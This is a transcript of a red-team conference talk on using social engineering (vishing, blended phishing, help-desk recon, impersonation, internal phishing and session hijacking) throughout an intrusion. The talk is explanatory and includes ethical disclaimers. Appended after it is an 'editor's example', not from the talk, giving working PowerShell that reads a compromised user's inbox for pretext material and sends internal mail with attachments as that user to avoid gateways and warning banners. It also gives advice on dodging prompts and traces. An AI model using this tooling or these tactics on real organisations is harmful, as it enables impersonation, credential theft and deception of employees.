
Thank you very much, and welcome to your TomTom lunchtime double-header for the red team track. So, who am I? I'm Tom Harrison. I've got over 15 years in various different types of infosec, with about half of that being on the offensive side. I've done a whole bunch of red teaming and I'm now head of offensive security for a large financial company; it's probably a pretty trivial OSINT exercise to find out which company. I classify myself as an adventure hacker, which is what I think red teaming has fallen under: I get to do hacking, but we also get to do things in person and out and about, doing things that are actually exciting with that side of it. I'm a gamer, I'm a dad of two toddlers and two teenagers; if you want to do high-intensity, low-complexity social engineering, I recommend parenting teenagers. I'm a complete psychology, language, systems, tech, gaming nerd; any of that stuff, I'll rant about for hours.

So what's this talk? This is a collection of learnings from mostly social engineering related stuff. About five or six years ago I started to go really deep on the people side of security, having done the technical side for ages, and then naturally went around conferences talking to people who had similar interests, digging things out of them, dealing with red teams as part of work, as well as the stuff I've learned when I've been doing social engineering exercises and that sort of thing. It's trying to look at social engineering as part of an attack path: rather than just using it at the start, using it throughout what red teams are doing in order to gain extra compromise and confuse blue teams. I'm going to look at more than just that initial first phish and trying to get initial access. I'm not going to be showing any people-security zero days; I'm not going to go "hey, if you say this magic word to people they'll let you through doors" or anything like that, and likewise the majority of the other stuff I'm presenting is mostly stuff that's been publicly released, or is just useful when you're in that situation.

So, standard disclaimers: don't break the law, only test systems you're allowed to test. Even in a red team, if you're doing social engineering or physical stuff, get it cleared with legal before you actually go and do it, because different countries, different laws, all that sort of stuff. Don't break ethics; for me this is a big one. If you're a consultancy team coming in to do red teaming, you don't want the company you're testing to be like "you've made six of our employees cry", and likewise if you're working internally as an offsec team then you don't want to be making your colleagues cry, because that's not going to help either. So in general, try and leave people feeling happy that they met you rather than sad about it. These are obviously my opinions, nothing to do with my employer or anyone else.

Cool. So, social engineering 101, or not really social engineering 101, because there's not enough time for that. I consider it to be the art or science of influencing or manipulating humans into doing something. Really broad, but it covers the main concepts that we'll deal with. So we use pretext, which is basically your excuse for why you're asking them to do a particular thing: "I'm Dave the aircon man who's come to fix that broken aircon unit in your data center" is an example of a pretext. We leverage a lot of human trust, so it's always important for me to be considerate of where you are, who you're talking to, what your pretext is, and what trust exists between you and the other people in an organization, or the people that you're trying to deal with or social engineer. And there's a whole ream of talks, books and research that cover social engineering in a lot more depth than I've got a chance to do here, so I've covered this to hopefully give a really rough overview, but do dive deeper and do your own research.
Cool. So we're going to skip through different stages of the kill chain. Whilst I've used the phrase "kill chain" for the Lockheed Martin structure of how attacks happen, these days it's not that linear and it's always been a bit of a poor model, so I'll mostly skip through the MITRE ATT&CK classifications as to how you classify a kill chain.

Reconnaissance. Active recon: the idea of, rather than the classic passive reconnaissance that most red teams do, trying to actually elicit stuff by engaging and contacting the organization, or actually digging and speaking to people. One of the things I always find is a really good way to find out stuff that you haven't managed to pick up from the external recon: if you're like "we're still not sure what AV they're using", when you're talking to a user you go "oh, what's the little icon that's next to the clock in the bottom right?" and they'll go "oh yeah, it's this weird M with a shield around it", and you know they're running McAfee, for example.

So always be ready when you're doing this sort of stuff. In the same way that if you're doing a pen test or red team and you do a mass phish right at the start, you expect that the defenders are going to spot that and are going to be like "we don't trust that domain any more", apply the same rules when you're doing vishing or anything like that: make sure that you're using new phone numbers, you're not using the same pretext you've used before, you're not using the same email addresses you've used before. You are engaging to find that information, but once the information's got, that is the end of this section of the campaign, so burn whatever it is you're using so they're not just going to detect you when you start using it again later on.

And then this is the really, really useful bit. Anyone who does this type of testing will go "we always end up falling back to OSINT and recon and things like that as you go through the test", to learn more with the things you've already found. So this active recon step: be ready to go back in and go "cool, this is what we know now, we can now be a more convincing person asking the help desk for help rather than a less convincing one".

Phishing for intelligence. Loads and loads of information can come just from a conversation with people. As well as stuff like "hey, what version of OS are they using, what software is on the machines, what AV are they using", you also get a whole bunch of cultural and language stuff that you'd normally consider to be a little bit outside the scope of the cyber side of testing, but it's so useful to be able to use that language, use that information, use what people have told you when you are engaging other humans in an organization.

Being able to get internally transferred is one of the most brilliant things when you're doing vishing-based testing. You're coming from an internal number that someone's just forwarded you from, and you've got that moment to potentially completely switch the pretext you're using. So initially you were a customer looking for help with a particular product that you're running, and then when they transfer you through, you get there and you know that you're coming from an internal number, and you go "yeah, one of the people in the help desk told me... I'm a sysadmin, I need to help you with the problems you've got on your product that we're using at the moment". So being able to quickly turn that and go "I need to switch to something that's got internal trust versus external customer trust" is really, really useful. It's worthwhile mentioning that this stuff's decaying: the more people are using Teams, the more people are using ticketing software, that sort of stuff, less and less is handled by phone systems. So you have to expect that if you're going outside of help desks or incident desks, that sort of thing, you're probably going to end up not being able to find a phone number to talk to someone.

Speaking of which: recon the help desk. Help desks are absolutely amazing for the amount of information you can pull from them. Everything from "hey, I'm a new starter, can you tell me how I get my password sorted and where I should find it" and that sort of stuff, through to "hey, how do I report an incident with this piece of software or this server that I've got issues with". And then they also spit back at you things like terminology: do they use the term tickets, do they use the term incidents, do they refer to servers in a certain way, are there certain naming conventions, that sort of stuff. It's all things that you can mine from a help desk, who are, by virtue of the name, trying to be helpful. Again, this is one of those things that you can use multiple times throughout, not just at the start: as you get through it, to go "this is an area where we now want to get a ticket raised for this machine", or we want to persuade them to do a certain type of thing at a certain point, the help desk is an instant source for all of that sort of stuff. And then the other thing is, as people know, a lot of social engineering pretexts involve "hey, I'm the guy from IT", just because it's second nature to the vast majority of us to be able to go "yes, I know technical stuff and I can talk networks and IT to you". So being able to listen to them talk to you gives you a really good
basis for what you build your pretext off when you want to go and pretend to be an IT admin or something later on.

Cool, so that's reconnaissance. We're going to go into initial access. This is probably a little bit untrue, but certainly single-stage phishing is dying. The idea of the phishing awareness campaigns, that sort of thing, and people sending just one email, getting a single click and then being able to compromise based on that, is getting harder and harder and harder. I've listed out there the things that will prevent you, or the things you have to overcome. Things like: has my origin domain for the email got a decent reputation? Is it configured how they're expecting an email server to be configured, so it looks legit? Then when emails come in, is the gateway going to detonate your malware, is it going to detect it based on signature? You've got to dodge all that stuff before you even land on the host. Then when you land on the host you've got AV and EDR to cope with, as well as user awareness. I've worked with a lot of really good education and awareness teams; it's getting better and better, and it's getting harder and harder to trick users into actually just clicking it, because they expect phish to look like that. And then that damn external email banner. If you work for a larger enterprise company, the vast majority of them these days have got a lovely, incredibly bright, eye-blinding piece of dreadful UI design that says "this is an external email", which is actually really, really, really effective at making people be a little bit more suspicious about what it is they're clicking on. And then, you've landed, you've bypassed all that stuff, and your payload's still got to reach back out to your C2 infrastructure; you've still got to get that last hook in. And then you've got to go through things like command and control domain reputation, you've got to get past the web gateway and whether it's going to detect the comms channel that you're using, then you've got to evade IDS or behaviour-based stuff, you've got to look at whether DNS is being inspected, a whole bunch of stuff which makes it really hard. And as an attacker, you don't really want to go the really hard route if you can avoid it.

So instead, multi-stage phishing, which is really great because you're not trying to go "hey, click this link"; you're trying to say "hey, engage with me", so I can start building rapport and start to gain a little bit of your trust to eventually leverage that for something else. It's really good to make sure you're doing your OSINT and getting degrees of knowing who you're targeting. You don't necessarily do a mass phish for this type of stuff, because it tends to be that you want to selectively group stuff to make it a little bit more convincing and start a conversation, but you do want to do it in bulk still and hit a reasonable amount of people. The beautiful thing about this is that you're trying to find people who might be susceptible to social engineering, so sending out an initial start of a conversation with people from an unknown address instantly identifies the people that are likely to be susceptible to social engineering. So you're completing your own pre-screening of them before you even start attacking. Conversations are really good for leveraging your pretext. It's difficult, in one email, to make someone believe that you are a guy from the IT help desk or something similar; if you're doing it over a long conversation, you start talking about work, you start talking about what you're doing today, you break out some of the standard routines that people expect, and you get a lot more chance to influence them and get them on your side. And hopefully by the time you get to the point where you're like "hey, can you click this, or can you go to this website and run this", they're already believing that you can't be one of those phish people, because one of those phish people sends loads of mails and aren't real people; they're just automated systems out there on the internet somewhere.

Talking about blended attacks: this is the idea of crossing over multiple streams of social engineering. Going from things like phishing, through to vishing, through to impersonation is a really good way of gaining trust, gaining people's belief in the pretext you're using. I spoke to a friend of mine who's a PhD in a history-related subject, and she was talking about the multiple-source idea: that you don't believe anything in history unless it comes from multiple sources. I think that's a lot of what forms that foundation as a human: if you're getting something from both a phone call and an email, you're a lot more likely to believe it than just either one of the two independently. I tend to find that ramping up the fidelity curve, so starting out with phishing and then following it with a phone call, or starting with a phone call and then following it with something in person, is the best way to do it. It's difficult to do it the other way around and go "yeah, I'm in person, but I'm going to send you a phishing email later"; it kind of defeats the purpose.

Vishing remote code execution. Obviously people find it a lot harder to say no when you're on voice rather than just clicking delete on a phish. Particularly British people really don't like saying no; I think it's natural, inbuilt manners. They love letting you tailgate, they love trying to help you out when you're on the phone. There's a really weird thing: much as I hate the UI design and sort of development lifecycle people, the idea of a target journey is something you should definitely spend time considering. So going "hey, how difficult is it for them to actually run through my process to be able to get exploitation? Can I easily point them at the right website? Are they going to get alerts that say this might be dodgy?", that sort of thing. Going "hey, what are they going to see, how do I need to talk them through it", and being ready to do that initial user support to get your payload landed. Ideally you come across as better and better at supporting your payload than the actual help desk is when they're trying to get them to do something. So this is where that initial recon, that digging in and going "hey, this is what services they're running, this is what security controls they're running", is really, really useful.

Impersonation, which is the in-person part of social engineering, actually showing up and pretending to be someone, is an incredibly deep and complex part of social engineering. There's a whole bunch of different stuff that you can read up about; it's very, very deep. There's a lot of crossover with physical, so you'll find that you're effectively doing physical pen testing; a lot of people refer to it as overt and covert physical pen testing. It's important to have your pretext at the ready, so both knowing who it is you're pretending to be, what you need to say if you get challenged, that sort of stuff, as well as the context: knowing whereabouts in the organization you are. If you're just walking around, most colleagues will expect "hey, that guy's just stood in an office", whereas if you're stood in a data hall or something like that, you need to have a pretext ready that fits the context of where you're being challenged. It's also good to know when to switch context, so having a colleague badge to be able to switch out for a visitor pass, things like that;
knowing what is the best person to be, or what is the best pretext to use, when you're in different situations within an organization.

We're going to move on to lateral movement, and we'll talk about moving from host to host and trying to confuse and baffle the blue team. Trust is really good for being assumed when you are internal. That phishing banner which I complain about endlessly has the added benefit of, whilst they're suddenly much more distrustful of stuff coming from external, it also means they're more trusting of stuff that's coming from internal. So if you can do internal phishing, and they've got one of those phishing banners, that's almost saying "hey, this will be okay", because it's not got a big banner at the top that's blinding you when you try and read the email. Use a variety of vectors. Whilst email's pretty good and it's probably the one that I default to most, try these other things: Teams messages, being able to dump stuff on servers and refer people to it, that sort of thing. I don't know many SOCs that will look at lateral movement and go "hey, did that user send any emails, did they send any Teams messages with attachments", that sort of thing. It starts to be harder and harder to dig into how people are moving across the network. Also, try and vary payload or infrastructure: if you're going to move from one place to another, don't be using the same payload that you were using initially; use something different.

So how can we do this? UNC paths, the classic thing. Neil Lines presented it here about five years ago; I sat and watched him in a workshop about using UNC paths to be able to capture credentials. Doing that when you're inside means that you've not got all the firewalls blocking those connections outbound. Using open shares to post maldocs, that sort of thing; using those types of things you can avoid web gateways, you don't have to do all that hard work to get your payloads in. OWA, Outlook Web Access, is a really good way to be able to start firing emails and pretending to be someone; there's a bunch of toolkits that let you do it. Stealing Office 365 tokens: Office helpfully keeps plaintext versions of your O365 creds in memory, so if you compromise the host you can just dump the creds for the O365 authentication. And then the Microsoft COM object, which is what Microsoft helpfully puts together for you to interface with Office products using PowerShell and things like that: you can use that to be able to start firing emails, or even in some cases use a full C2 over email.

Privilege escalation. When we've got a compromised host on the network, you can essentially act like an internal honeypot for admins. So you can go "oh, this user's got a problem" or "I've got a problem with this laptop" or "hey, I'm this user, please can you log in and sort out my access because I can't seem to get Word running", and trigger an admin to log into you rather than trying to wait for the admin to log in. Ideally, get the user to raise something, get them to raise a ticket so it looks even more legitimate, but raise it yourself if you can't. Try and make things seem operational rather than security related: you don't want an admin logging on because he thinks there's some sort of security issue on a box if you've got a payload running on it, unless you're really, really confident about how well hidden you are. So yeah, be aware that they're going to come looking for you. Password vaults: another really good source of privilege escalation, a really high value target. If anywhere has defences around it, if anyone's going to notice you're attacking it, it's probably the password vault. So rather than try and break in, instead let a trusted user go and break something out for you that you need. Go and compromise someone that you know will be doing work on that server or will pick up a ticket to do with X, Y or Z, and then go and get one of those tickets raised so they go and break the password out for you and then sit it on their little client that's likely got a lot less security than the big powerful password vault.

Action on objectives: are you achieving what it is we want to do? Session hijacking is probably one of the ones that is used most at the moment. You wait for a user to actively log into the web page or the application that they need to log into to do their work, at which point you can then drag their credentials out of memory, dump whatever authentication they're using, use man-in-the-browser if necessary, and use the credentials that they've already authenticated with to piggyback on. Again, hanging around and waiting for these users to do that and then following them is a bit boring; it doesn't drive towards your objectives very quickly. So engaging the users, finding a reason why they need to log in, pushing them to go and do the thing, means that you can trigger it using social engineering rather than having to sit and wait forever. Then, even in really highly secure organizations, understandably, they all want to make money, and that often comes as a higher priority than "we want to be really secure". So if you can work out, based on internal recon, based on the things you've found from different areas that you've been inside the network, that there's some sort of business priority, you can push them to break security rules in order to accomplish your business priority. That's why it's really important to understand the context and the job role and the communications and daily activities of users you've compromised, because if you're going to leverage one of them for some sort of "hey, I need this right goddamn now", then you need to know who it is that you're going to be speaking as. So yeah, it's important to know you've got a full record of the environment: knowing what words to use, knowing what to refer to things as, knowing what security controls may or may not be in place process-wise for people doing things or not doing things. And then the classic one: there are situations I've heard of, I've spoken to friends who've done it, where you don't even need to do all of the prerequisites for getting into a red team. Literally phoning up, pretending to be the right person who needs the right thing right now, can just get an objective, particularly when we're talking about sensitive files or commercial information or intellectual property. Just being able to call up and go "I've got this really urgent business need right now that I need to accomplish, so can you just send me the thing" will sometimes work, and will sometimes mean that you can shortcut an entire adversary simulation operation and just cut right to the end and get your objective. Cool, so that is the end. I think we've got five minutes, so, any questions?
Audience: [largely inaudible; transcribed as: we have a research engineer that involves squats and other social messages, actually kind of systems that companies may use]

Tom: So, for those who can't hear, that question was whether there's any kind of using methods other than just email for text-based social engineering, so phishing and trying to come in through different channels. Yes. There are dangerous things around scope there, because those types of accounts tend to... like, Teams is pretty good for it, and trying to shift into the Microsoft ecosystem; when you start to go to WhatsApp or LinkedIn or social media, you stand a really high chance of hitting people's home machines or personal information rather than business information, and that sort of stuff. So yes, but it's very, very difficult to do it without treading on toes or causing potential legal issues and stuff.

Audience: [largely inaudible; transcribed as: surface... and can it be the way]

Tom: So the question was, is there a certain type of person who's predisposed to being good for physical or in-person social engineering? Yes and no. For those of you who are D&D nerds, I always refer to it as: I'm maxed intelligence and dumped wisdom, and then learned how to use my intelligence bonus for charisma. So there are ways you can look at the science of this, of how to do it, to be able to learn how to use what you know, how to basically structure conversation to do the right things. Also, if you're nervous, if you're the stereotypical IT nerd, you just make your pretext fit that. So going in and going "oh, it's my first day, I'm really nervous" compensates for the fact that it's your first social engineering engagement and you're really nervous. You don't get quite as much flexibility if you are having to lock into those things, but yeah, you can still leverage them and you can still do it.

Audience: [inaudible] ...are there any specific books or resources?

Tom: Yeah, absolutely. Are there any specific books or resources? Joe Gray's social engineering books; talks by Rachel Tobac, Leith Dennis, Chris Hadnagy; Chris Hadnagy's books are really good. And then it falls back onto Cialdini's principles of trust and the other associated documents that are old-school con man or salesman tactics, which are actually really, really useful; there's a big, big crossover between sales and social engineering, which makes me sad. And books-wise, Catch Me If You Can... sorry, TV and film-wise, Catch Me If You Can, and some of the Lie to Me stuff is good watching, as well as social engineering... [unclear]. Great, thank you very much.
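Editor's added example, not part of the talk or any tool it references: the Outlook COM object technique mentioned in the lateral-movement section, where a compromised user's own Outlook is driven from PowerShell so mail goes out under their internal identity and never crosses the external gateway or picks up the external banner. The second function also does the recon the talk keeps coming back to: it reads recent inbox subjects and sender names so the pretext can borrow the organization's own terminology. It assumes Outlook is installed with a configured profile in the current interactive user session; the function names, parameter names and the sample addresses are this example's own choices, not anything from the talk.

```powershell
# Added example (editor's, not from the talk). Uses the Outlook Object Model via COM.
# Assumes Outlook is installed and the logged-on user has a working mail profile.
# Function and parameter names are this example's own.

$script:olMailItem    = 0    # OlItemType.olMailItem
$script:olFolderInbox = 6    # OlDefaultFolders.olFolderInbox
$script:olMailClass   = 43   # OlObjectClass.olMail (skips meeting requests, receipts, etc.)

function Get-RecentInboxSubjects {
    # Recon step: who mails this user, about what, and in which words
    # (ticket vs incident, server naming, sign-offs) before writing a pretext.
    param([int]$Count = 20)

    $outlook = New-Object -ComObject Outlook.Application
    $inbox   = $outlook.GetNamespace("MAPI").GetDefaultFolder($script:olFolderInbox)
    $items   = $inbox.Items
    $items.Sort("[ReceivedTime]", $true)   # $true = descending, newest first

    $seen = 0
    foreach ($item in $items) {
        if ($item.Class -ne $script:olMailClass) { continue }
        [pscustomobject]@{
            From     = $item.SenderName
            Received = $item.ReceivedTime
            Subject  = $item.Subject
        }
        $seen++
        if ($seen -ge $Count) { break }
    }
    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($outlook) | Out-Null
}

function Send-InternalMail {
    # Send as the logged-on user. The message is created and sent by the user's own
    # Outlook, so it is internal-to-internal traffic from a trusted sender.
    param(
        [Parameter(Mandatory)] [string]$To,
        [Parameter(Mandatory)] [string]$Subject,
        [Parameter(Mandatory)] [string]$Body,
        [string]$AttachmentPath
    )

    $outlook = New-Object -ComObject Outlook.Application
    $mail    = $outlook.CreateItem($script:olMailItem)
    $mail.To      = $To
    $mail.Subject = $Subject
    $mail.Body    = $Body
    if ($AttachmentPath) {
        # Attachments.Add wants a full path; Resolve-Path fails loudly if it is missing.
        $full = (Resolve-Path -LiteralPath $AttachmentPath).Path
        $mail.Attachments.Add($full) | Out-Null
    }
    $mail.Send()
    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($outlook) | Out-Null
}

# Usage (addresses and wording are hypothetical):
# Get-RecentInboxSubjects -Count 10 | Format-Table -AutoSize
# Send-InternalMail -To 'helpdesk@corp.example' -Subject 'INC raised: Word will not start' `
#     -Body 'Hi team, ticket raised as per process; can someone log in and take a look? Thanks.'
```

Two practitioner caveats. Outlook's Object Model Guard can pop a "a program is trying to send e-mail on your behalf" prompt, or block the call outright, when sending programmatically or reading address properties, depending on Outlook version and the antivirus status Outlook sees; an interactive prompt on the user's screen is exactly the kind of thing the talk warns will get you noticed. And everything sent this way lands in the user's Sent Items, so the "did that user send any emails" check the speaker says few SOCs perform is, for this vector, a straightforward mailbox audit rather than a network one.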